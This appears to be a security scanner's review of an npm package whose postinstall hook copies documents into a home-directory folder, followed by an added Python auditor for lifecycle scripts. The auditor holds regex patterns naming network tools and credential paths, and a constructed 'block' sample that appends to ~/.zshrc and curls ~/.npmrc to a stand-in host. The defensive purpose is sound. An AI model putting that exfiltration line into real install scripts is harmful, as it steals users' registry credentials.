AI Security Review
scanned 16h ago · by lpm-firewall-ai
LPM treats this as a warn-only, first-party agent-extension lifecycle risk. The package has an install-time lifecycle hook that seeds AI Flow knowledge files into a home-directory app namespace. This is an agent-extension lifecycle risk, but no confirmed malicious hijack or exfiltration behavior was found.
Static reason
One or more suspicious static signals were detected.
Trigger
npm install (postinstall hook); optionally, the user-invoked ai-flow-skills install/check CLI commands
Impact
Home-directory AI Flow knowledge/solution files are created or updated; user-invoked CLI may register skills globally for selected agents.
Mechanism
The postinstall lifecycle script copies bundled AI Flow docs into ~/.ai-flow; the CLI can install the bundled skills through the skills CLI (npx skills add).
Policy narrative
On install, postinstall seeds bundled knowledge and flow-solution documents into ~/.ai-flow. Full agent skill registration is exposed through a user-invoked CLI that calls npx skills add globally for a selected agent. The inspected files do not show unconsented mutation of foreign agent configs, persistence, credential access, or data exfiltration.
Rationale
Because the lifecycle code writes agent-facing support content into a home-level package namespace at install time, this is warned as an agent-extension lifecycle risk. The stronger block condition is not met: the only foreign-agent control-surface mutation (skill registration) is user-invoked, and no malicious payload, credential harvesting, persistence, or exfiltration was found.
Evidence
- package.json
- scripts/postinstall.sh
- scripts/ai-flow-skills-cli.sh
- scripts/install.sh
- dist/claude-code/ai-flow/SKILL.md
- dist/claude-code/ai-flow-build/SKILL.md
- $HOME/.ai-flow/knowledge
- $HOME/.ai-flow/flow-solutions
- dist/user-data/knowledge
- dist/user-data/flow-solutions
- dist/claude-code
Network endpoints (2)
- npm registry, via the user-invoked version check npm view digitalsee-ai-flow-skills version
- npx skills add registry resolution (user-invoked skill install)
Decision evidence
Public snapshot: the AI classifier called this Suspicious at 86.0% confidence (category: Dangerous Capability) with medium false-positive risk.
Evidence for warning
- package.json defines postinstall: bash scripts/postinstall.sh
- scripts/postinstall.sh automatically creates and writes $HOME/.ai-flow/knowledge and $HOME/.ai-flow/flow-solutions
- Package ships Claude Code skill documents under dist/claude-code/*/SKILL.md for agent behavior guidance
- scripts/ai-flow-skills-cli.sh: the user-invoked install command runs npx skills add ... --global --copy
Evidence against
- postinstall only copies bundled dist/user-data files into the package-owned ~/.ai-flow namespace
- No install-time writes to .claude, Cursor, MCP config, shell startup, VCS hooks, or autostart files found
- No credential harvesting, secret reads, or exfiltration logic found
- Network use is limited to user-invoked version check via npm view and user-invoked npx skills install
- Skill content is product-aligned AI Flow workflow guidance with explicit user confirmation gates for destructive actions
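The triage laid out in the policy narrative, rationale and evidence lists above, as an added example (not the scanner's own code and not the package's scripts): a Python auditor that pulls the install-time lifecycle hooks out of package.json, scans the referenced shell script for the same signals this review weighs (home-directory writes, foreign-agent config or shell-startup mutation, network tools, credential paths) and maps them onto a simplified warn/block policy. The package.json, the two postinstall bodies, the regex lists and the warn/block mapping are constructed approximations of what the review describes rather than the real files; the second script is a deliberately block-worthy counterexample so both branches of the policy are exercised.

```python
import json
import re

# Constructed sample inputs modelled on the evidence above; not the package's real files.
SAMPLE_PACKAGE_JSON = """{
  "name": "example-ai-flow-skills",
  "version": "0.0.0",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "bash scripts/postinstall.sh"
  }
}"""

# Warn-class body: copies bundled docs into a package-owned home-directory namespace.
WARN_POSTINSTALL = """#!/usr/bin/env bash
set -euo pipefail
PKG_DIR="$(cd "$(dirname "$0")/.." && pwd)"
mkdir -p "$HOME/.ai-flow/knowledge" "$HOME/.ai-flow/flow-solutions"
cp -R "$PKG_DIR/dist/user-data/knowledge/." "$HOME/.ai-flow/knowledge/"
cp -R "$PKG_DIR/dist/user-data/flow-solutions/." "$HOME/.ai-flow/flow-solutions/"
"""

# Block-class counterexample (constructed): shell-startup persistence plus credential exfiltration.
BLOCK_POSTINSTALL = """#!/bin/sh
echo 'export PATH="$HOME/.agent/bin:$PATH"' >> "$HOME/.zshrc"
curl -s https://collector.example.invalid/up --data-binary @"$HOME/.npmrc"
"""

# Hooks npm runs on its own during `npm install`, with no further user action.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare",
                   "preprepare", "postprepare", "prepublish"}

HOME_REF = re.compile(r"\$HOME\b|\$\{HOME\}|(?<![\w/])~/")
WRITE_VERB = re.compile(r"\b(mkdir|cp|mv|tee|ln|touch|rsync)\b|>>?\s*\S")
# Foreign-agent configs, shell startup, VCS hooks, autostart: the block condition in the rationale.
CONTROL_SURFACE = re.compile(
    r"\.claude|\.cursor|mcp\.json|\.bashrc|\.zshrc|\.profile|\.git/hooks|autostart|LaunchAgents",
    re.I)
NETWORK_TOOL = re.compile(r"\b(curl|wget|npx|nc|ncat|ssh|scp)\b")
SECRET_PATH = re.compile(r"\.npmrc|\.ssh/|\.aws/|\.netrc|\.env\b|id_rsa|_TOKEN\b|_SECRET\b")


def lifecycle_scripts(package_json_text):
    """Return only the scripts npm runs without the user invoking them."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return {hook: cmd for hook, cmd in scripts.items() if hook in LIFECYCLE_HOOKS}


def triage_script(script_text):
    """Tag a lifecycle script body with the signals the review weighs, line by line."""
    signals = set()
    for raw in script_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # skip blanks, shebang and comment lines
            continue
        if HOME_REF.search(line) and WRITE_VERB.search(line):
            signals.add("home_dir_write")      # write outside the package directory
        if CONTROL_SURFACE.search(line):
            signals.add("control_surface")     # foreign agent / persistence surface touched
        if NETWORK_TOOL.search(line):
            signals.add("network")             # install-time network capability
        if SECRET_PATH.search(line):
            signals.add("secret_access")       # credential-bearing path referenced
    return signals


def verdict(hooks, signals):
    """Simplified warn/block mapping (an assumption, not the scanner's exact policy)."""
    if not hooks:
        return "pass"
    if signals & {"control_surface", "secret_access"}:
        return "block"
    if signals & {"home_dir_write", "network"}:
        return "warn"
    return "review"   # lifecycle hook present but not recognised: needs a human look


def audit(package_json_text, script_files):
    """script_files maps a path token in the hook command (e.g. scripts/postinstall.sh) to its text."""
    hooks = lifecycle_scripts(package_json_text)
    signals = set()
    for cmd in hooks.values():
        body = [cmd]                           # the command line itself can carry curl/npx
        for token in cmd.split():
            if token in script_files:
                body.append(script_files[token])
        signals |= triage_script("\n".join(body))
    return {"hooks": hooks, "signals": signals, "verdict": verdict(hooks, signals)}


if __name__ == "__main__":
    for label, body in (("warn-sample", WARN_POSTINSTALL), ("block-sample", BLOCK_POSTINSTALL)):
        print(label, audit(SAMPLE_PACKAGE_JSON, {"scripts/postinstall.sh": body}))
```

To apply this before a real install, fetch the tarball with npm pack and run the auditor over the extracted package/ directory; npm install --ignore-scripts stops postinstall from running at all, at the cost of skipping every dependency's lifecycle scripts, including legitimate native build steps.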
Behavioral surface
Source & flagged code
3 flagged

package.json
- scripts.postinstall = bash scripts/postinstall.sh
- High: Install Time Lifecycle Scripts. Package defines install-time lifecycle scripts.
- Medium: Ambiguous Install Lifecycle Script. Install-time lifecycle script is not statically allowlisted and needs review.

scripts/install.sh
- path = scripts/install.sh
- kind = build_helper
- sizeBytes = 3815
- magicHex = [redacted]
- Medium: Ships Build Helper. Package ships non-JavaScript build or shell helper files.

Findings
1 High · 2 Medium · 1 Low
- High: Install Time Lifecycle Scripts (package.json)
- Medium: Ambiguous Install Lifecycle Script (package.json)
- Medium: Ships Build Helper (scripts/install.sh)
- Low: Scripts Present